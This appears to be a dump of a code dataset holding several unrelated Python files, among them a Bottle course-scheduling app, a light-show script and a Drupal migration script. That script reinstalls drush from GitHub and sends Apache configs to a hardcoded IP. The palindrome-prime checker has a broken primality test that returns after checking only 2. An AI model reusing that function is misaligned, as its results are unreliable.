callback_url=''):\n \"\"\"\n :storage_domain: 导出文件的storage的domain名称\n :filename: 导出文件名称,格式:prefix[.format][.compression],例:abc.csv.zip,服务根据format来判断数据类型,数据类型包括sql/csv\n :table_name: 导出数据库类型为mysql时,使用的表名\n :callback_url: 任务成功时,调用的回调url,只支持应用默认版本中的url,为空时,不执行回调url\n \"\"\"\n self['tasktype'] = 'export'\n self['dbtype'] = 'mysql'\n self['dbname'] = 'app_{app_name}'.format(app_name=const.APP_NAME)\n\n self['stor_domain'] = storage_domain.strip()\n if not self['stor_domain']:\n raise InvalidJobError(\"storage domain can't be empty\")\n\n self['stor_filename'] = filename.strip()\n if not self['stor_filename']:\n raise InvalidJobError(\"filename can't be empty\")\n\n self['tbname'] = table_name\n self['callback'] = callback_url\n\n\nclass DeferredJob(object):\n\n \"\"\"大文件导入导出服务\"\"\"\n\n def __init__(self):\n \"\"\"初始化\"\"\"\n\n def add(self, job):\n \"\"\"添加任务\n :returns: 成功返回任务id\n \"\"\"\n job['function'] = 'add'\n result = self._remote_call(job)\n if result['result'] == 0:\n return int(result['ret'])\n elif result['result'] == -1:\n raise InvalidJobError(result['message'])\n elif result['result'] == -6:\n raise TooManyJobsError(result['message'])\n else:\n raise InternalError(result['message'])\n\n def status(self, job_id):\n \"\"\"获得任务状态\n :job_id: 任务的id, 整型\n :returns: 成功返回任务状态:未进入队列:waiting;等待执行:inqueue;执行中:excuting;完成:done;失败:abort。失败返回False\n \"\"\"\n if job_id < 0:\n raise InvalidJobError('invalid job id')\n data = {'function': 'getstatus', 'id': job_id}\n result = self._remote_call(data)\n if result['result'] == 0:\n return result['ret']\n else:\n raise OperationError(result['message'])\n\n def delete(self, job_id):\n \"\"\"删除任务\n :job_id: 任务的id, 整型\n :returns: 成功返回True,进入excuting状态的任务不能被删除\n \"\"\"\n if job_id < 0:\n raise InvalidJobError('invalid job id')\n data = {'function': 'delete', 'id': job_id}\n result = self._remote_call(data)\n if result['result'] == 0:\n return True\n else:\n raise OperationError(result['message'])\n\n @retry(InternalError)\n def _remote_call(self, data):\n headers = {'SAEAPPNAME': const.APP_NAME}\n data['result_type'] = 'json'\n data['from'] = 'api'\n req = urllib2.Request(url=_BASE_URL, data=urllib.urlencode(data), headers=headers)\n response = urllib2.urlopen(req)\n if not response.code == 200:\n raise InternalError()\n return json.loads(response.read())\n\n\ndef add(job):\n DeferredJob().add(job)\n","sub_path":"python/deferredjob.py","file_name":"deferredjob.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"356546163","text":"num = 151\n\ndef is_prim(num):\n for i in range(2, num):\n if num % i == 0:\n return False\n else:\n return True\ndef is_pailn(num):\n num_p = 0\n num_t = num\n while num != 0:\n num_p = num_p * 10 + num % 10\n num = num // 10\n if num_t == num_p:\n return True\n else:\n return False\nif is_prim(num) and is_pailn(num):\n print(\"yes it is\")\nelse:\n print(\"no it's not\")\n","sub_path":"basc/palin_prime.py","file_name":"palin_prime.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497537044","text":"# https://leetcode.com/problems/single-number-iii/\n\nclass Solution(object):\n\n # Time complexity: O(n)\n # Space complexity: O(1)\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n xor = 0\n for num in nums:\n xor ^= num\n\n lowbit = xor & -xor\n\n res1 = res2 = 0\n for num in nums:\n if num & lowbit != 0:\n res1 ^= num\n else:\n res2 ^= num\n\n return [res1, res2]","sub_path":"single-number-iii.py","file_name":"single-number-iii.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537069640","text":"import geom\nimport color\nimport time\n\nimport random\nimport math\n\nimport looping_show\nfrom randomcolor import random_color\nimport tween\n\nclass RYB(looping_show.LoopingShow):\n # Because we extend LoopingShow we must explicitly override is_show to be True\n is_show = True\n \n name = \"RYB\"\n\n modifier_usage = {\n \"toggles\": {\n 0: \"Add 0.25 to brightness\",\n 1: \"Add second 0.25 to brightness\",\n 3: \"Increase speed 2x\",\n },\n \"step\": {\n 0: \"Icicles are colored in order\",\n 1: \"Random colors per icicle\",\n 2: \"Rays of color\",\n 3: \"All same color\"\n },\n \"intensified\": \"Length of hue range\"\n }\n\n def __init__(self, sheep_sides):\n looping_show.LoopingShow.__init__(self, sheep_sides)\n self.duration = 32\n\n # Setup a unique offset for each icicle\n self.offsets = []\n for icicle in geom.ICICLES:\n self.offsets.append(random.random())\n\n\n def set_controls_model(self, cm):\n super(RYB, self).set_controls_model(cm)\n self.control_modifiers_changed()\n\n def was_selected_randomly(self):\n self.cm.reset_step_modifiers(random.randrange(3))\n self.cm.set_modifier(3, (random.randrange(10) > 4))\n self.cm.set_intensified((random.random() * 2.0) - 1.0)\n\n def control_modifiers_changed(self):\n if self.cm.modifiers[3]:\n self.duration = 16\n else:\n self.duration = 32\n\n def control_step_modifiers_changed(self):\n mode = self.step_mode(4)\n if mode in self.modifier_usage[\"step\"]:\n self.cm.set_message(self.modifier_usage[\"step\"][mode])\n else:\n self.cm.set_message(\"Mode %d\" % mode)\n\n def finalFromRGB(self, rgb):\n b = 0.5\n if self.cm.modifiers[0]:\n b += 0.25\n if self.cm.modifiers[1]:\n b += 0.25\n\n return color.RGB(rgb[0] * b, rgb[1] * b, rgb[2] * b)\n\n def update_at_progress(self, progress, new_loop, loop_instance):\n mode = self.step_mode(4)\n\n if mode == 0:\n # Color striped from top to bottom by slices\n v_range = tween.easeInQuad(0.1, 0.98, (self.cm.intensified + 1.0)/2.0)\n #v_range = 0.1 + ((self.cm.intensified + 1.0)/2.0 * 0.89) # how much of the hue cycle to spread across top to bottom\n\n per_slice = v_range / len(geom.ICICLES)\n\n for idx, sl in enumerate(geom.ICICLES):\n hue = progress - (idx * per_slice) + self.offsets[0]\n while hue > 1.0:\n hue -= 1.0\n while hue < 0.0:\n hue += 1.0\n\n hsv = (hue, 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n\n # Now factor in an intensity\n # v = 0.2 + (((self.cm.intensified + 1.0) / 2.0) * 0.8)\n\n # rgb = color.RGB(*rgbTuple)\n # rgb = color.RGB(rgbTuple[0] * v, rgbTuple[1] * v, rgbTuple[2] * v)\n\n self.ss.party.set_cells(sl, self.finalFromRGB(rgbTuple))\n\n\n elif mode == 1:\n # Each icicle gets a unique color based on it's offset\n for idx,icicle in enumerate(geom.ICICLES):\n hue = progress + self.offsets[idx]\n if hue > 1.0:\n hue -= 1.0\n hsv = (hue, 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n # rgb = color.RGB(*rgbTuple)\n\n self.ss.party.set_cells(icicle, self.finalFromRGB(rgbTuple))\n\n elif mode == 2:\n # Set colors element by element in each ring based on radial\n for ring_ix, ring in enumerate(geom.RINGS):\n step = 1.0 / len(ring)\n\n for tube_ix, tube in enumerate(ring):\n hue = progress + self.offsets[0] + tube_ix * step\n while hue > 1.0:\n hue -= 1.0\n while hue < 0.0:\n hue += 1.0\n\n hsv = (hue, 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n # rgb = color.RGB(*rgbTuple)\n\n self.ss.party.set_cell(tube, self.finalFromRGB(rgbTuple))\n\n\n else:\n # Everything the same color\n hsv = (progress + self.offsets[0], 1.0, 1.0)\n\n rgbTuple = color.hsvRYB_to_rgb(hsv)\n self.ss.party.set_all_cells(self.finalFromRGB(rgbTuple))\n\n\n \n","sub_path":"deployments/ght_apr_2016/shows/ryb.py","file_name":"ryb.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"50762542","text":"HUE_BRIDGE_IP = '192.168.2.4'\nHUE_BRIDGE_USER = 'newdeveloper'\nHUE_BRIDGE_PORT = '80'\nHUE_LIGHT_ID = 9\n\nTOTAL_DURATION_MINUTES = 30\n\nBUIENRADAR_WEATHER_STATION = '6278'\nBUIENRADAR_MEASUREMENT = 'temperatuur10cm' # Should only be 'temperatuurGC' or 'temperatuur10cm'\n\n# Color which is picked is always the one 'above' the offset.\n# If it's 12.5 degrees, it will be an orange color\nTEMPERATURE_COLORS = {\n -100: (255,255,255), # Hell freezing over White\n 0: (15, 255, 255), # Freezing Cool Mint Blue\n 6: (0, 172, 230), # Freezing Blue\n 10: (230, 187, 0), # Pretty cold Yellow\n 15: (50, 230, 0), # Chilly Green\n 20: (230, 130, 0), # Convenient Orange\n 99: (214, 0, 0) # YH cool Superhot Red\n}","sub_path":"config/settings_base.py","file_name":"settings_base.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"38057624","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\nimport socket\nimport re\nimport time\nimport struct\nimport datetime \n\ndef backUP(DOC,sitio):\n\ts1 = \"\"\n\tf = open(DOC, \"r\")\n\tfor linea in f:\n\t if linea.lower().find(\"documentroot\") != -1:\n\t pat = re.compile(\".*#.*documentroot.*\")\n\t result = pat.match(linea.lower())\n\t if(result == None):\n\t l1 = linea.split()\n\t for j in l1[1:]:\n\t s1+=j+' '\n\t s = s1.split('#')\n\t cad = s[0].rstrip().lstrip()\n\t break\n\tf.close()\n\tdateTimeObj = datetime.datetime.now()\n\ttimestampStr = dateTimeObj.strftime(\"%H_%M_%S_%f-%d-%b-%Y.tar.gz\")\n\tsubprocess.Popen(['drush', 'archive-dump', '--destination=/var/www/bck'+sitio+timestampStr,'-r',cad]).wait()\n\tprint(\"Respaldo Creado\")\n\ndef downloadDrush(type):\n\tif(type):\n\t\tcomands = [\"/usr/local/sbin/drush\",\"/usr/local/bin/drush\",\n\t\t\"/usr/sbin/drush\", \"/usr/bin/drush\",\"/sbin/drush\",\"/bin/drush\"]\n\t\tfor c in comands :\n\t\t\tsubprocess.Popen(['rm',c],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\t\tsubprocess.Popen(['apt-get','purge','drush','-y'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tsubprocess.Popen(['wget','https://github.com/drush-ops/drush/releases/download/8.3.2/drush.phar'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tsubprocess.Popen(['chmod','+x','drush.phar'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tsubprocess.Popen(['mv','drush.phar','/usr/bin/drush'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\ndef verificandoDrush():\n\ttry:\n\t\tdrush = subprocess.Popen(['drush','--version'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n\t\tversion = drush.stdout.read().decode().find('8.3.2')\n\t\tif (version == -1 ):\n\t\t\tprint(\"Actualizando drush\")\n\t\t\tdownloadDrush(True)\n\texcept FileNotFoundError:\n\t\tprint(\"Instalando drush\")\n\t\tdownloadDrush(False)\n\tprint(\"Drush instalado/actualizado\")\n\t\n\ndef verificandoGit():\n\ttry:\n\t\tgit = subprocess.Popen(['git'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n\texcept FileNotFoundError:\n\t\tprint(\"Instalando git\")\n\t\tsubprocess.Popen(['apt-get','install','git'],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).wait()\n\tprint(\"Git instalado\")\t\n\ndef exportSiteConfig(IP,DOC,DOC2):\n\tf = open (DOC, \"rb\")\n\tl = f.read(1000000)\n\tf2 = open (DOC2, \"rb\")\n\tl2 = f2.read(1000000)\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tconnected = False\n\tprint(\"Esperando conexion para mandar archivo\", end = '', flush=True)\n\twhile not connected:\n\t\ttry:\n\t\t\ttime.sleep(1)\n\t\t\ts.connect((IP,1331))\n\t\t\tconnected = True\n\t\texcept Exception as e:\n\t\t\tprint(\". \", end = '', flush=True)\n\ts.sendall(bytes(DOC, 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"\\n\\nRespuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(l)\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(bytes(' ', 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(bytes(DOC2, 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"\\n\\nRespuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(l2)\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\n\ts.sendall(bytes(' ', 'UTF-8'))\n\tdata = s.recv(1024)\n\tprint (\"Respuesta: \" + data.decode(\"utf-8\"))\n\tf.close()\n\tf2.close()\n\ts.close()\n\nverificandoDrush()\nverificandoGit()\n\"\"\"\nflag = False\npat = re.compile(\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\nIP = input('Ingrese la ip del host:\\n')\nresult = pat.match(IP)\nwhile result == None:\n\tIP = input('[!] Ingrese una ip correcta:\\n')\n\tresult = pat.match(IP)\n\nDOC = input('Ingrese la ruta absoluta del archivo de configuración del sitio1\\n')\nwhile(os.path.isfile(\"DOC) == False):\n DOC = input(\"[!] Ingresa la ruta completa del archivo de configuración.\\n\")\n\nDOC2 = input('Ingrese la ruta absoluta del archivo de configuración del sitio1\\n')\nwhile(os.path.isfile(\"DOC2) == False):\n DOC2 = input(\"[!] Ingresa la ruta completa del archivo de configuración.\\n\")\n\"\"\"\nIP = \"192.168.216.145\"\nDOC = '/etc/apache2/sites-available/drupal.conf'\nDOC2 = '/etc/apache2/sites-available/drupal2.conf'\nbackUP(DOC,\"sitio1\")\n#backUP(DOC2,\"sitio2\")\nexportSiteConfig(IP,DOC,DOC2)\nprint(\"\\nSe termino de enviar los archivos de configuracion.\")","sub_path":"Herramienta/exportador.py","file_name":"exportador.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"176219748","text":"\ndef build(bld):\n defines = ''\n features = []\n if bld.options.submission:\n defines = 'ONLINE_JUDGE'\n\n bld.program(features = 'cxx programrunner',\n use = 'gtest',\n uselib = 'pthread',\n include = ['.'],\n source = bld.path.ant_glob('*.cxx'),\n defines = defines,\n target = 'BridgeHandEvaluator')\n\n","sub_path":"uva/challenges/BridgeHandEvaluator/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"534587478","text":"from bottle import route, run\nfrom bottle import template,request\nfrom bottle import static_file\n\nfrom model.course \t import course\nfrom model.professor import professor\nfrom model.teach \t import teach\nfrom model.schedule import schedule\nfrom model.exeSQL \t import execute_sql\nfrom model.student \t import student\nfrom model.room \t import room\n\n# ***************************** ********************************* #\n\n# ***************************** Static Files ********************************* #\n@route('/js/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/js', mimetype='text/script')\n\n@route('/jquery-ui/js/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/jquery-ui/js', mimetype='text/script')\n\n@route('/jquery-ui/dist/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/jquery-ui/dist', mimetype='text/script')\n\n@route('/css/')\ndef server_static_css(filename):\n\treturn static_file(filename, root='./static/css', mimetype='text/css')\n\n@route('/jquery-ui/development-bundle/themes/base/')\ndef server_static_css(filename):\n\treturn static_file(filename, root='./static/jquery-ui/development-bundle/themes/base', mimetype='text/css')\n\n@route('/jquery-ui/development-bundle/ui/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/jquery-ui/development-bundle/ui', mimetype='text/script')\n\n@route('/jquery-ui/development-bundle/themes/base/images/')\ndef server_static_image(filename):\n\treturn static_file(filename, root='./static/jquery-ui/development-bundle/themes/base/images', mimetype='image/png')\t\n\n@route('/image/')\ndef server_static_image(filename):\n\treturn static_file(filename, root='./static/image', mimetype='image/png')\t\n\t\n# ***************************** global variables ********************************* #\t\nexesql = execute_sql()\nsch_table = schedule(exesql)\nstudent = student(exesql)\nroom = room(exesql)\ncrs = course(exesql)\nprof = professor(exesql)\ntch = teach(exesql)\n\n# ***************************** Routers ********************************* #\n\n@route('/', method=\"GET\")\ndef CourseSchedule():\n\treturn template('CourseSchedule')\n\n# ***************************** scheduling ********************************* #\n\n@route('/pust_schedule')\ndef schedule():\n\treturn template('show_table', ttable=sch_table.schedule())\t\n\n@route('/timetable')\ndef get_timetable():\n\treturn template('show_table', ttable=sch_table.get_timetable())\t\n\n@route('/print_table')\ndef print_table():\n\tsch_table.print_table()\n\treturn '', get_timetable()\n\n# ***************************** Student CRUD ********************************* #\t\n\n@route('/student', method=\"GET\")\ndef list_class():\n\treturn template('student',rows = student.search_class_([]))\t\n\n@route('/add_stdnt',method = \"GET\")\ndef new_class():\n\treturn template('student_crud', ID = '', fac = '', maj = '', yea = '0', num = '', rooms = '', flg_modify = 0)\t\n\n@route('/add_stdnt/main', method = \"GET\")\ndef new_class_main():\n\tnew_item =[]\n\tnew_item.append(request.GET.get('s_fclt','').strip())\n\tnew_item.append(request.GET.get('s_major','').strip())\n\tnew_item.append(request.GET.get('s_entyr','').strip())\n\tnew_item.append(request.GET.get('s_num','').strip())\n\tnew_item.append(request.GET.get('s_rnum','').strip())\n\n\tresult_flag = student.new_class_(new_item)\n\n\tif result_flag == -1:\n\t\treturn ''\n\telse:\n\t\treturn template('student',rows = student.search_class_([]))\t\n\n@route('/modify_student/:s_id/:faculty/:major/:year/:number/:room', method = 'GET')\ndef modify_class(s_id,faculty,major,year,number,room ):\n\t'''processing the strings'''\n\ts_id = s_id.strip(':')\n\tfaculty = faculty.strip(':')\n\tmajor = major.strip(':')\n\tyear = year.strip(':')\n\tnumber = number.strip(':')\n\troom = room.strip(':')\n\t\n\treturn template('student_crud', ID = s_id, fac = faculty, maj = major, yea = year, num = number, rooms = room, flg_modify = 1)\n\n@route('/modify_student/update/:ID', method='GET')\ndef update_class(ID):\n\t#put the item in the list\n\tupdate_item = []\n\ts_ID = ID.strip(':')\n\tupdate_item.append(s_ID)\n\tupdate_item.append(request.GET.get('s_fclt','').strip())\n\tupdate_item.append(request.GET.get('s_major','').strip())\n\tupdate_item.append(request.GET.get('s_entyr','').strip())\n\tupdate_item.append(request.GET.get('s_num','').strip())\n\tupdate_item.append(request.GET.get('s_rnum','').strip())\n\tstudent.update(update_item)\n\treturn list_class()\n\n@route('/modify_student/delete/:ID', method='GET')\ndef delete_class(ID):\n\tresult = student.delete(ID.strip(':'))\n\tif result == False:\n\t\treturn '', list_class()\n\telse:\n\t\treturn list_class()\n\n# ***************************** Co-room CRUD ********************************* #\n\n@route('/co_room', method=\"GET\")\ndef list_room():\n\treturn template('co_room',rows = room.search_room_([]))\n\n@route('/co_room_add',method = \"GET\")\ndef new_room():\n\t'''inserting new items'''\n\treturn template('croom_crud', no = '', size= '', typ = '',pos = '', flg_modify = 0)\n\t\n@route('/co_room_add/main',method = \"GET\")\ndef new_room_main():\n\tnew_item =[]\n\tnew_item.append(request.GET.get('rm_no','').strip())\n\tnew_item.append(request.GET.get('rm_cpct','').strip())\n\tnew_item.append(request.GET.get('rm_type','').strip())\n\tnew_item.append(request.GET.get('rm_pos','').strip())\n\t\n\tresult_flag = room.new_room_(new_item)\n\tif result_flag == -1 :\n\t\treturn '

The new data was inserted in the room table

'\n\telif result_flag == 0:\n\t\treturn '

There are some problems in the data

'\n\telse:\n\t\treturn list_room()\n\n@route('/co_room_modify/:r_no/:r_size/:r_type/:r_pos', method = 'GET')\ndef modify_room(r_no,r_size,r_type,r_pos):\n\tr_no = r_no.strip(':')\n\tr_size = r_size.strip(':')\n\tr_type = r_type.strip(':')\n\tr_pos = r_pos.strip(':')\t\n\treturn template('croom_crud', no = r_no, size= r_size, typ = r_type,pos = r_pos, flg_modify = 1)\n\n@route('/modify_room/update/:no', method='GET')\ndef update_room(no):\n\tupdate_item=[]\n\tupdate_item.append(no.strip(':'))\n\tupdate_item.append(request.GET.get('rm_cpct','').strip())\n\tupdate_item.append(request.GET.get('rm_type','').strip())\n\tupdate_item.append(request.GET.get('rm_pos','').strip())\n\t\n\tresult_flag = room.update_room_(update_item)\n\t\n\tif result_flag :\n\t\treturn list_room()\t\t\t\t\n\telse:\n\t\treturn '

Errors in updating co-room information!

'\n\n\t\n@route('/modify_room/delete/:no', method='GET')\ndef delete_room(no):\n\tdelete_item = no.strip(':')\n\tresult_flag = room.delete_room_(delete_item)\n\t\n\tif result_flag:\n\t\treturn list_room()\n\telse:\n\t\treturn template('fail')\n\n# ***************************** Course CRUD ********************************* #\n\n@route('/course', method = \"GET\")\ndef course_list():\n\t\"\"\"This function shows all the courses which has been taken and will be taken in connection with database. \"\"\"\n\tresult = crs.course_list()\n\treturn template('course', rows = result)\n\n#######################################################################################\n\"\"\" Add a new Course with vID, Title, totalHours, lectureHours, recitationHours, labHours\"\"\"\n#######################################################################################\n@route('/course_create', method = 'GET')\ndef course_create():\n\t\"\"\"This function would create a new course which has Title, total Hours, lecture Hours, rectiation Hourse, lab Hours.\n\tIt is noticed that the course which has the same either vId or title could not create.\n\t\"\"\"\n\treturn template('course_create')\n\t\n@route('/course_create/create', method = 'GET')\ndef course_create_create():\t\n\tc_vId = request.GET.get('c_vId', '').strip()\n\tc_Title = request.GET.get('c_Title', '').strip()\n\tc_tHours = request.GET.get('c_tHours', '').strip()\n\tc_lHours = request.GET.get('c_lHours', '').strip()\n\tc_rHours = request.GET.get('c_rHours', '').strip()\n\tc_labHours = request.GET.get('c_labHours', '').strip()\n\t\n\tresult = crs.course_create_create(c_Title, c_tHours, c_lHours, c_rHours, c_labHours, c_vId)\n\tif result == True:\n\t\treturn course_list()\n\telse:\n\t\treturn '', template('course_create')\n\t\t#return template('course_create')\n\t\n##########################################################################################\n\"\"\" Modify the Course with Title, totalHours, lectureHours, recitationHours, labHours \"\"\"\n##########################################################################################\t\t\n@route('/course_modify/:course_Id/:course_vId/:course_Title/:course_tHours/:course_lHours/:course_rHours/:course_labHours', method = 'GET')\ndef course_modify(course_Id, course_vId, course_Title, course_tHours, course_lHours, course_rHours, course_labHours):\n\t\"\"\"This function is to modify the given course such as update or delete.\"\"\"\n\tc_id = course_Id.strip(':')\n\tc_vid = course_vId.strip(':')\n\tc_Title = course_Title.strip(':')\n\tc_tHours = course_tHours.strip(':')\n\tc_lHours = course_lHours.strip(':')\n\tc_rHours = course_rHours.strip(':')\n\tc_labHours = course_labHours.strip(':')\n\t\n\treturn template('course_modify', ID = c_id, vId = c_vid, title = c_Title, tHours = c_tHours , lHours = c_lHours, rHours = c_rHours, labHours = c_labHours)\n\n#######################Update information of the specific course####################\n@route('/course_modify/update/:ID', method = 'GET')\ndef course_update(ID):\n\t\"\"\"This function implements to update the specific course with certain options.\"\"\"\n\tc_Id = ID.strip(':')\n\tc_Title = request.GET.get('c_Title','').strip()\n\tc_tHours = request.GET.get('c_tHours','').strip()\n\tc_lHours = request.GET.get('c_lHours','').strip()\n\tc_labHours = request.GET.get('c_labHours','').strip()\n\tc_rHours = request.GET.get('c_rHours','').strip()\n\tc_vId = request.GET.get('c_vId','').strip()\n\t\n\tresult = crs.course_update(c_Id, c_vId, c_Title, c_tHours, c_lHours, c_rHours, c_labHours)\n\treturn course_list()\n\n#######################Delete information of the specific course####################\t\n@route('/course_modify/delete/:ID', method = 'GET')\ndef course_delelte(ID):\n\t\"\"\"This function make a progress to delete the specific course; moreover, you should confirm the course is whether on lecture or not.\"\"\"\n\tc_Id = ID.strip(':')\n\t\n\tresult = crs.course_delete(c_Id)\n\tif result == False:\n\t\treturn '', course_list()\n\telse:\n\t\treturn '', course_list()\n\n# ***************************** Professor CRUD ********************************* #\n\t\t\n@route('/professor')\ndef prof_list():\n\t\"\"\"This function shows all the professors who teach in connection with database. \"\"\"\n\tresult = prof.prof_list()\n\treturn template('professor', rows = result)\n \n#######################################################################################\n\"\"\" Add a new Professor with his Name, his Preference for lectures \"\"\"\n#######################################################################################\t\n@route('/prof_create', method = 'GET')\ndef prof_create():\n\t\"\"\"This function would create a new professor with his name and preference.\n\tIt is noticed that the professor who has the same name could not create.\n\t\"\"\"\n\treturn template('prof_crud', ID = 0, name = '', pref = '', flg_modify = 0)\t\t\n\t\n@route('/prof_create/create', method = 'GET')\ndef prof_create_create():\t\n\t\tp_Name = request.GET.get('p_Name', '').strip()\n\t\tp_Pref = request.GET.get('p_Pref', '').strip()\n\t\tresult = prof.prof_create_create(p_Name, p_Pref)\n\t\tif result == True:\n\t\t\treturn prof_list()\n\t\telse:\n\t\t\treturn '', template('prof_create')\n\t\t\t#return template('prof_create')\n\n##########################################################################################\n\"\"\" Modify the Professor with his Name and his Preference \"\"\"\n##########################################################################################\t\n@route('/prof_modify/:prof_Id/:prof_name/:prof_pref', method = 'GET')\ndef prof_modify(prof_Id, prof_name, prof_pref):\n\t\"\"\"This function is to modify the given professor such as update or delete.\"\"\"\n\tp_id = prof_Id.strip(':')\n\tp_name = prof_name.strip(':')\n\tp_pref = prof_pref.strip(':')\t\n\treturn template('prof_crud', ID = p_id, name = p_name, pref = p_pref, flg_modify = 1)\t\n\n#######################Update information of the specific professor####################\n@route('/prof_modify/update/:ID', method='GET')\ndef prof_update(ID):\n\t\"\"\"This function implements to update the specific professor with certain options.\"\"\"\n\tp_Id = ID.strip(':')\n\tp_Pref = request.GET.get('p_Pref','').strip()\n\tp_Name = request.GET.get('p_Name','').strip()\n\t\t\n\tresult = prof.prof_update(p_Id, p_Name, p_Pref)\n\treturn prof_list()\n#######################Delete information of the specific professor####################\t\n@route('/prof_modify/delete/:ID', method='GET')\ndef prof_delelte(ID):\n\t\"\"\"This function make a progress to delete the specific professor; moreover, you should confirm the professor is whether on lecture or not.\"\"\"\n\tp_Id = ID.strip(':')\n\t\n\tresult = prof.prof_delete(p_Id)\n\tif result == False:\n\t\treturn '', prof_list()\n\telse:\n\t\treturn '', prof_list()\t\n\n# ***************************** Teach CRUD ********************************* #\t\t\n\n@route('/teach')\ndef teach_list():\n\t\"\"\"This function shows all the schedules who are on in connection with database. \"\"\"\n\tresult = tch.teach_list() \n\treturn template('teach', schedule = result)\n\n############################################################################################\n\"\"\" Add a new Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n############################################################################################\n@route('/teach_choose')\ndef teach_choose():\n\t\"\"\"This function would create a new schedule with coures title, professor name, student, and duration.\"\"\"\n\tupdate_item = tch.teach_choose() \n\treturn template('teach_create', update = update_item) \n \n@route('/teach_create')\ndef teach_create():\t\n\tcourse = request.GET.get('course', '').strip()\n\tprofessor = request.GET.get('professor', '').strip()\n\tstudent = request.GET.get('student', '').strip()\n\tstart = request.GET.get('stdate', '').strip()\n\tfinish = request.GET.get('fndate', '').strip()\n\t\t\n\tresult = tch.teach_create(course, professor, student, start, finish)\t\n\tif result == True:\n\t\treturn teach_list()\n\telse:\n\t\treturn '', template('teach_create')\n\n###############################################################################################\n\"\"\" Modify a new Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n###############################################################################################\t\n@route('/teach_modify/:t_Id')\ndef teach_modify(t_Id):\n\t\"\"\"This function is to modify the given schedule such as update or delete.\"\"\"\n\tt_id = t_Id.strip(':')\n\t\n\tupdate_item = tch.teach_modify(t_id)\n\treturn template('teach_modify', t_Id = t_id, update = update_item)\n\t\n###############################################################################################\n\"\"\" Update the Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n###############################################################################################\t\n@route('/teach_modify/update/:t_id', method='GET')\ndef teach_update(t_id):\n\t\"\"\"This function implements to update the specific schedule with certain options.\"\"\"\n\tt_Id = t_id.strip(':')\t\n\tc_Id = request.GET.get('course', '').strip()\n\tp_Id = request.GET.get('professor', '').strip()\n\ts_Id = request.GET.get('student', '').strip()\n\tstart = request.GET.get('stdate', '').strip()\n\tfinish = request.GET.get('fndate', '').strip()\n\t\n\tresult = tch.teach_update(t_Id, c_Id, p_Id, s_Id, start, finish)\n\treturn teach_list()\n###############################################################################################\n\"\"\" Delete the Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n###############################################################################################\t\t\n@route('/teach_modify/delete/:ID', method='GET')\ndef teach_delelte(ID):\n\t\"\"\"This function make a progress to delete the specific schdule.\"\"\"\n\tt_Id = ID.strip(':')\n\t\n\tresult = tch.teach_delete(t_Id)\n\treturn teach_list()\t\t\n\t\nif __name__ =='__main__':\n\trun(host='0.0.0.0', port = 7756, reloader = 'TRUE')\n","sub_path":"CourseSchedule.py","file_name":"CourseSchedule.py","file_ext":"py","file_size_in_byte":17117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"72601533","text":"# !/usr/bin/env python\n\n\"\"\"Spreadsheet\nOpens a CSV spreadsheet for reading and searching operations.\nIdeas: pickle handling with __call__ && __init__, print formatting,\n\"\"\"\nfrom prettytable import PrettyTable\nfrom pathlib import Path\nimport csv\n\n# Programs author information\n__author__ = \"Mauricio Lomeli\"\n__date__ = \"8/22/2019\"\n__credits__ = [\"Rebecca Zhuo, Smruti Vidwans\"]\n__license__ = \"MIT\"\n__version__ = \"0.0.0.1\"\n__maintainer__ = \"Mauricio Lomeli\"\n__email__ = \"mjlomeli@uci.edu\"\n__status__ = 